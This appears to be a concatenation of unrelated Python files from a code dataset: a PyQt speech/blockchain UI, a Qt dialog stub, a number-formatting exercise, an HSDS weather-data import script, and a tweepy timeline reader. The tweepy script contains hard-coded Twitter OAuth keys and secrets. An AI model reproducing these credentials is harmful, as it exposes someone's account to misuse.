        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(1)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Apply all user-visible (translatable) strings (generated code)."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "讯飞接口"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "自主模型"))
        self.sentence_box.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Arial\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'SimSun\'; font-size:12pt;\"><br /></p></body></html>"))
        self.keyword_box.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'SimSun\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:12pt;\"><br /></p></body></html>"))
        self.groupBox_1.setTitle(_translate("MainWindow", "关键词提取"))
        self.groupBox_3.setTitle(_translate("MainWindow", "区块链"))
        self.mine_but.setText(_translate("MainWindow", "挖矿"))
        self.add_but.setText(_translate("MainWindow", "添加交易"))
        self.inquire_but.setText(_translate("MainWindow", "查询信息"))
        self.status_label_3.setText(_translate("MainWindow", "TextLabel"))
        self.groupBox_4.setTitle(_translate("MainWindow", "实时语音转写"))
        self.start_but.setText(_translate("MainWindow", "start"))
        self.stop_but.setText(_translate("MainWindow", "stop"))
        self.play_but.setText(_translate("MainWindow", "playback"))
        self.keyword_but.setText(_translate("MainWindow", "keyword"))
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
if __name__ == '__main__':
    # Manual preview entry point: build the generated UI on a bare
    # QMainWindow and hand control to the Qt event loop.
    preview_app = QApplication(sys.argv)
    main_window = QMainWindow()
    window_ui = Ui_MainWindow()
    window_ui.setupUi(main_window)
    main_window.show()
    sys.exit(preview_app.exec_())
import sys
from PyQt5.QtWidgets import QDialog, QApplication, QGridLayout, QGroupBox, QPushButton, QLineEdit
#from PyQt5.QtWidgets import QLabel, QFileDialog, QRadioButton, QComboBox
class App(QDialog):
    """Minimal dialog skeleton: one group box holding a line edit and a button."""
    def __init__(self):
        # Window placement/size defaults, applied by initUI.
        super().__init__()
        self.title = "Title"
        self.left = 0
        self.top = 0
        # NOTE(review): self.width/self.height shadow QWidget.width()/height();
        # calling those methods on this instance later would break — confirm
        # nothing relies on them.
        self.width = 600
        self.height = 100
        self.initUI()
    def initUI(self):
        """Apply window settings, assemble the widget grid, and show the dialog."""
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        main_grid = QGridLayout()
        self.config_settings()
        main_grid.addWidget(self.upper_left_section, 0, 0)
        #main_grid.addWidget(self.upper_right_section, 0, 1)
        #main_grid.addWidget(self.lower_left_section, 1, 0)
        #main_grid.addWidget(self.lower_right_section, 1, 1)
        self.setLayout(main_grid)
        self.show()
    def do_this(self):
        """Click handler stub for the button; intentionally a no-op."""
        return
    def config_settings(self):
        """Build the upper-left group box with its line edit and button."""
        section_grid = QGridLayout()
        self.upper_left_section = QGroupBox("GroupBox 1")
        self.upper_left_section.setLayout(section_grid)
        self.editedable_field = QLineEdit()
        section_grid.addWidget(self.editedable_field, 0, 1)
        self.btn = QPushButton("Button 1")
        self.btn.clicked.connect(self.do_this)
        section_grid.addWidget(self.btn, 0, 2)
if __name__ == '__main__':
    # Standard Qt bootstrap: build the dialog and run the event loop
    # until the window is closed.
    qt_app = QApplication(sys.argv)
    dialog = App()
    sys.exit(qt_app.exec_())
|
def print_formatted(number):
    """Print 1..number, one row per value, showing decimal, octal,
    uppercase hexadecimal and binary, each right-aligned to the width
    of number's binary representation and separated by single spaces."""
    width = len(bin(number)[2:])
    for value in range(1, number + 1):
        columns = (str(value), oct(value)[2:], hex(value)[2:].upper(), bin(value)[2:])
        print(" ".join(text.rjust(width) for text in columns))
if __name__ == '__main__':
    # Read the upper bound from stdin and print the formatted number table.
    n = int(input())
    print_formatted(n)
|
##############################################################################
# Copyright by The HDF Group. #
# All rights reserved. #
# #
# This file is part of HSDS (HDF5 Scalable Data Service), Libraries and #
# Utilities. The full HSDS copyright notice, including #
# terms governing use, modification, and redistribution, is contained in #
# the file COPYING, which can be found at the root of the source code #
# distribution tree. If you do not have access to this file, you may #
# request a copy from help@hdfgroup.org. #
##############################################################################
import sys
import signal
import random
import numpy as np
import time
import json
import asyncio
from aiohttp import ClientSession, TCPConnector, HttpProcessingError
import config
import hsds_logger as log
from helper import getRequestHeaders
globals = {}
def checkDockerLink():
    """Return True if /etc/hosts contains an hsds_sn* host entry,
    i.e. we are running with docker links to the SN containers."""
    with open('/etc/hosts') as hosts_file:
        for entry in hosts_file.readlines():
            parts = entry.split('\t')
            if len(parts) < 2:
                continue
            if parts[1].startswith("hsds_sn"):
                return True
    return False
async def getEndpoints():
    """Ask the head node for the active SN (service node) list and store
    their base URLs in globals["sn_endpoints"].

    Host selection per node: docker link name when links are present,
    the docker-machine IP when configured, otherwise the node's own host.
    NOTE(review): endpoints are only stored on a 200 response — a failure
    leaves globals["sn_endpoints"] unset; confirm callers handle that.
    """
    docker_machine_ip = config.get("docker_machine_ip")
    req = "{}/nodestate/sn".format(config.get("head_endpoint"))
    client = globals["client"]
    globals["request_count"] += 1
    async with client.get(req) as rsp:
        if rsp.status == 200:
            rsp_json = await rsp.json()
            nodes = rsp_json["nodes"]
            sn_endpoints = []
            docker_links = checkDockerLink()
            for node in nodes:
                if not node["host"]:
                    continue
                if docker_links:
                    # running with docker links: address SN containers by link name
                    host = "hsds_sn_{}".format(node["node_number"])
                elif docker_machine_ip:
                    # docker-machine (VM) setup: use the machine address as host
                    host = docker_machine_ip
                else:
                    host = node["host"]
                url = "http://{}:{}".format(host, node["port"])
                sn_endpoints.append(url)
            log.info("{} endpoints".format(len(sn_endpoints)))
            globals["sn_endpoints"] = sn_endpoints
def getEndpoint():
    """Return one SN endpoint chosen at random (simple load spreading)."""
    return random.choice(globals["sn_endpoints"])
def getFileList():
    """Populate globals["input_files"] from a list file.

    The file name defaults to filelist.txt and may be overridden by the
    first CLI argument; -h/--help prints usage and exits.  Blank lines
    and '#'-comment lines are skipped.
    """
    file_list = "filelist.txt"
    if len(sys.argv) > 1 and sys.argv[1] in ("-h", "--help"):
        print("usage: import_ghcn_files [filelist.txt]")
        sys.exit()
    if len(sys.argv) > 1:
        file_list = sys.argv[1]
    with open(file_list) as listing:
        stripped = (raw.rstrip() for raw in listing)
        input_files = [entry for entry in stripped
                       if entry and not entry.startswith('#')]
    globals["input_files"] = input_files
async def createGroup(parent_group, group_name):
    """Create a new group and link it under parent_group as group_name.

    Returns the id of the linked group.  If another task wins the race and
    creates the link first (409 on the PUT), the existing link is fetched
    and its target group id is returned instead.
    Raises HttpProcessingError on any unexpected server response.
    """
    client = globals["client"]
    domain = globals["domain"]
    params = {"host": domain}
    base_req = getEndpoint()
    headers = getRequestHeaders()
    timeout = config.get("timeout")
    # TBD - replace with atomic create & link operation?
    # create a new (anonymous) group first; link it in a second request
    req = base_req + "/groups"
    log.info("POST:" + req)
    globals["request_count"] += 1
    async with client.post(req, headers=headers, params=params, timeout=timeout) as rsp:
        if rsp.status != 201:
            log.error("POST {} failed with status: {}, rsp: {}".format(req, rsp.status, str(rsp)))
            raise HttpProcessingError(code=rsp.status, message="Unexpected error")
        group_json = await rsp.json()
        group_id = group_json["id"]
    # link group to parent
    req = base_req + "/groups/" + parent_group + "/links/" + group_name
    data = {"id": group_id }
    link_created = False
    log.info("PUT " + req)
    globals["request_count"] += 1
    async with client.put(req, data=json.dumps(data), headers=headers, params=params, timeout=timeout) as rsp:
        if rsp.status == 409:
            # another task has created this link already
            log.warn("got 409 in request: " + req)
        elif rsp.status != 201:
            log.error("got http error: {} for request: {}, rsp: {}".format(rsp.status, req, rsp))
            raise HttpProcessingError(code=rsp.status, message="Unexpected error")
        else:
            link_created = True
    if not link_created:
        # lost the race: fetch the existing link and return its target group
        # (the group created above is left unlinked/orphaned)
        log.info("GET " + req)
        globals["request_count"] += 1
        async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
            if rsp.status != 200:
                log.warn("unexpected error (expected to find link) {} for request: {}".format(rsp.status, req))
                raise HttpProcessingError(code=rsp.status, message="Unexpected error")
            else:
                rsp_json = await rsp.json()
                link_json = rsp_json["link"]
                if link_json["class"] != "H5L_TYPE_HARD":
                    raise ValueError("Unexpected Link type: {}".format(link_json))
                group_id = link_json["id"]
    return group_id
async def verifyGroupPath(h5path):
    """Walk h5path from the root, creating any missing groups along the way.

    Uses globals["h5path_cache"] (path -> group id) to skip server roundtrips
    for segments already resolved.  Returns the id of the final group.
    Raises HttpProcessingError on unexpected server responses and ValueError
    if a path segment resolves to a non-hard link.
    """
    #print("current task: ", asyncio.Task.current_task())
    client = globals["client"]
    domain = globals["domain"]
    h5path_cache = globals["h5path_cache"]
    params = {"host": domain}
    parent_group = h5path_cache['/'] # start with root
    group_names = h5path.split('/')
    headers = getRequestHeaders()
    base_req = getEndpoint() + '/groups/'
    next_path = '/'
    timeout = config.get("timeout")
    for group_name in group_names:
        if not group_name:
            continue # skip empty names
        next_path += group_name
        if not next_path.endswith('/'):
            next_path += '/' # prep for next roundtrips
        if next_path in h5path_cache:
            # we already have the group id
            parent_group = h5path_cache[next_path]
            continue
        # look up the link for this segment; create the group on 404
        req = base_req + parent_group + "/links/" + group_name
        log.info("GET " + req)
        globals["request_count"] += 1
        async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
            if rsp.status == 404:
                parent_group = await createGroup(parent_group, group_name)
            elif rsp.status != 200:
                raise HttpProcessingError(code=rsp.status, message="Unexpected error")
            else:
                rsp_json = await rsp.json()
                link_json = rsp_json["link"]
                if link_json["class"] != "H5L_TYPE_HARD":
                    raise ValueError("Unexpected Link type: {}".format(link_json))
                parent_group = link_json["id"]
            # remember the resolved id for subsequent calls
            h5path_cache[next_path] = parent_group
    return parent_group
async def verifyDomain(domain):
    """Ensure *domain* exists (creating it on 404) and record its root
    group id in globals["root"].

    NOTE(review): any status other than 200/404 on the initial GET leaves
    root_id as None, which is then stored — confirm callers tolerate that.
    """
    params = {"host": domain}
    headers = getRequestHeaders()
    client = globals["client"]
    req = getEndpoint() + '/'
    root_id = None
    log.info("GET " + req)
    globals["request_count"] += 1
    timeout = config.get("timeout")
    async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
        if rsp.status == 200:
            domain_json = await rsp.json()
        else:
            log.info("got status: {}".format(rsp.status))
    if rsp.status == 200:
        root_id = domain_json["root"]
    elif rsp.status == 404:
        # create the domain, then re-fetch it to learn the new root id
        log.info("PUT " + req)
        globals["request_count"] += 1
        async with client.put(req, headers=headers, params=params, timeout=timeout) as rsp:
            if rsp.status != 201:
                log.error("got status: {} for PUT req: {}".format(rsp.status, req))
                raise HttpProcessingError(code=rsp.status, message="Unexpected error")
        log.info("GET " + req)
        globals["request_count"] += 1
        async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
            if rsp.status == 200:
                domain_json = await rsp.json()
                root_id = domain_json["root"]
            else:
                log.error("got status: {} for GET req: {}".format(rsp.status, req))
                raise HttpProcessingError(code=rsp.status, message="Service error")
    globals["root"] = root_id
async def import_line(line):
    """Parse one GHCN CSV line and store its observation as an attribute.

    Expected format: station,date,obstype,value,... (8 comma-separated
    fields).  The group path /data/<station>/<obstype> is created as needed
    and the value is written as an int32 attribute named after the date.
    Malformed lines are logged and skipped.

    Fixed: the warning messages used "[()]" instead of "[{}]" so the
    offending line never appeared, and the date-length message said
    "station".
    """
    domain = globals["domain"]
    params = {"host": domain}
    headers = getRequestHeaders()
    client = globals["client"]
    globals["lines_read"] += 1
    # per-task record consumed by print_results for latency statistics
    task_log = {}
    task_log["line"] = line
    task_log["start"] = time.time()
    fields = line.split(',')
    if len(fields) != 8:
        log.warn("unexpected number of fields in line: [{}]".format(line))
        return
    station = fields[0]
    if len(station) != 11:
        log.warn("unexpected station length line: [{}]".format(line))
        return
    date = fields[1]
    if len(date) != 8:
        log.warn("unexpected date length line: [{}]".format(line))
        return
    obstype = fields[2]
    if len(obstype) != 4:
        log.warn("unexpected obstype length line: [{}]".format(line))
        return
    value = 0
    try:
        value = int(fields[3])
    except ValueError:
        log.warn("unexpected value in line: [{}]".format(line))
        return
    # TBD - do something with other fields
    log.info("data: {} {} {} {}".format(station, obstype, date, value))
    h5path = "/data/" + station + "/" + obstype
    task_log["h5path"] = h5path
    task_log["state"] = "INPROGRESS"
    globals["tasks"].append(task_log) # add before the first await
    try:
        grp_id = await verifyGroupPath(h5path)
    except HttpProcessingError as hpe:
        log.error("failed to verifyGroupPath: {}, err: {}".format(h5path, str(hpe)))
        globals["failed_line_updates"] += 1
        task_log["state"] = "COMPLETE"
        return
    # create the attribute (name = observation date, value = reading)
    data = {'type': 'H5T_STD_I32LE', 'value': value}
    req = getEndpoint() + "/groups/" + grp_id + "/attributes/" + date
    log.info("PUT " + req)
    globals["request_count"] += 1
    task_log["req"] = req
    timeout = config.get("timeout")
    async with client.put(req, headers=headers, data=json.dumps(data), params=params, timeout=timeout) as rsp:
        task_log["stop"] = time.time()
        task_log["state"] = "COMPLETE"
        task_log["status"] = rsp.status
        if rsp.status == 409:
            # attribute already exists (duplicate line or earlier run)
            log.warn("409 for req: " + req)
        elif rsp.status != 201:
            log.error("got status: {} for req: {}".format(rsp.status, req))
            globals["failed_line_updates"] += 1
        else:
            globals["attribute_count"] += 1
def import_file(filename):
    """Schedule one import_line task per line of *filename*, running them
    on the shared event loop in batches of max_concurrent_tasks."""
    log.info("import_file: {}".format(filename))
    loop = globals["loop"]
    batch_limit = config.get("max_concurrent_tasks")
    pending = []
    with open(filename, 'r') as source:
        for raw_line in source:
            pending.append(asyncio.ensure_future(import_line(raw_line.rstrip())))
            if len(pending) >= batch_limit:
                # batch is full — run it to completion before reading on
                loop.run_until_complete(asyncio.gather(*pending))
                pending = []
    # flush whatever is left over from the final partial batch
    loop.run_until_complete(asyncio.gather(*pending))
    globals["files_read"] += 1
def print_results():
    """Dump the run summary: resolved path cache, counters, and
    per-request latency statistics."""
    log.info("h5path_cache...")
    h5path_cache = globals["h5path_cache"]
    elapsed_time = time.time() - globals["start_time"]
    cached_paths = sorted(h5path_cache.keys())
    for path in cached_paths:
        log.info(f"{path} -> {h5path_cache[path]}")
    print(f"files read: {globals['files_read']}")
    print(f"lines read: {globals['lines_read']}")
    print(f"lines unable to process: {globals['failed_line_updates']}")
    print(f"num groups: {len(cached_paths)}")
    print(f"attr created: {globals['attribute_count']}")
    print(f"requests made: {globals['request_count']}")
    # only tasks that both started and finished contribute a latency sample
    latencies = [t["stop"] - t["start"]
                 for t in globals["tasks"]
                 if "start" in t and "stop" in t]
    timings = np.array(latencies)
    print("latencies...")
    print(f"runtime: {elapsed_time:.2f} s")
    print(f"lines/sec: {globals['lines_read'] / elapsed_time:.2f}")
    print(f"avg: {timings.mean():.2f} s")
    print(f"min: {timings.min():.2f} s")
    print(f"max: {timings.max():.2f} s")
    print(f"std: {timings.std():.2f} s")
def sig_handler(sig, frame):
    """SIGTERM/SIGINT handler: report whatever was accomplished, then exit."""
    log.warn(f"Caught signal: {sig}")
    print_results()
    sys.exit()
def main():
    """Entry point: set up the event loop and shared HTTP session, discover
    SN endpoints, verify the target domain, then import every input file
    and print a summary."""
    domain = "/home/" + config.get("user_name") + "/" + config.get("domain_name")
    print("domain: {}".format(domain) )
    getFileList() # populates file_list global
    log.info("initializing")
    signal.signal(signal.SIGTERM, sig_handler) # add handlers for early exit
    signal.signal(signal.SIGINT, sig_handler)
    loop = asyncio.get_event_loop()
    globals["loop"] = loop
    #domain = helper.getTestDomainName()
    # create a client Session here so that all client requests
    # will share the same connection pool
    max_tcp_connections = int(config.get("max_tcp_connections"))
    client = ClientSession(loop=loop, connector=TCPConnector(limit=max_tcp_connections))
    globals["client"] = client
    # run counters reported by print_results
    globals["files_read"] = 0
    globals["lines_read"] = 0
    globals["attribute_count"] = 0
    globals["request_count"] = 0
    globals["tasks"] = []
    globals["failed_line_updates"] = 0
    loop.run_until_complete(getEndpoints())
    if len(globals["sn_endpoints"]) == 0:
        log.error("no SN endpoints found!")
        loop.close()
        client.close()
        sys.exit()
    for endpoint in globals["sn_endpoints"]:
        log.info("got endpoint: {}".format(endpoint))
    loop.run_until_complete(verifyDomain(domain))
    globals["domain"] = domain # save the domain
    # keep a lookup table of h5paths to obj ids to reduce server roundtrips
    h5path_cache = {'/': globals["root"]}
    globals["h5path_cache"] = h5path_cache
    log.info("domain root: {}".format(globals["root"]))
    loop.run_until_complete(verifyGroupPath("/data"))
    input_files = globals["input_files"]
    globals["start_time"] = time.time()
    for filename in input_files:
        import_file(filename)
    # NOTE(review): the loop is closed before client.close(); in newer aiohttp
    # ClientSession.close() is a coroutine and needs a running loop — confirm
    # against the pinned aiohttp version.
    loop.close()
    client.close()
    print_results()
# Guard the entry point so importing this module does not start an import run.
if __name__ == "__main__":
    main()
import tweepy
# SECURITY(review): hard-coded OAuth credentials committed to source control
# must be treated as compromised — rotate them and load from environment
# variables or an untracked config file instead of string literals.
consumer_key = "B4PbUyBHiQbch0VxFSKB2tWJf"
consumer_secret = "SbSc0v79lRYKJdzN8IDFZ3gXRKnI9DpFxOVf3mtsg3uEHJBVHN"
access_token = "3020843641-cibXWf5cW8xCXoBTw2CUId6jIcb1jfhap5mJndJ"
access_token_secret = "nYZHd4NxNemcvmjvBQtIriGyUWB6tLvJMn4T354G3pCax"
# Authenticate via OAuth 1.0a and print the text of each tweet on the
# authenticated user's home timeline.
auth = tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api = tweepy.API(auth)
public_tweets = api.home_timeline()
for tweet in public_tweets:
	print (tweet.text)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.